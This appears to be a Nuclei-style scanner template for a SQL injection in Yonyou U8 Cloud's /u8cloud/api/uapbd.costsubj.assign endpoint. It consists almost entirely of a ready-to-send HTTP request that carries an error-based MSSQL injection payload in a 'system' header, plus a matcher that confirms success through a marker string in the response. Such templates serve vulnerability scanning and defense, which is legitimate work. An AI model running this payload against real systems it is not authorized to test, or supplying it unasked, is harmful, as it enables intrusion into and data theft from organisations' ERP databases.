id: yonyou-u8-cloud-uapbd-sqli
info:
  name: 用友U8 Cloud /u8cloud/api/uapbd.costsubj.assign SQL注入
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://vip.bdziyi.com/58461/
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    version:
  tags: sqli,u8cloud

http:
  - raw:
      - |
        GET /u8cloud/api/uapbd.costsubj.assign HTTP/1.1
        Host: {{Hostname}}
        system: ' AND 6783 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6783=6783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)))-- xBCW
        User-Agent: Mozilla/5.0 (compatible; poc-bot)
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'qbkkq1qqpbq')
        condition: and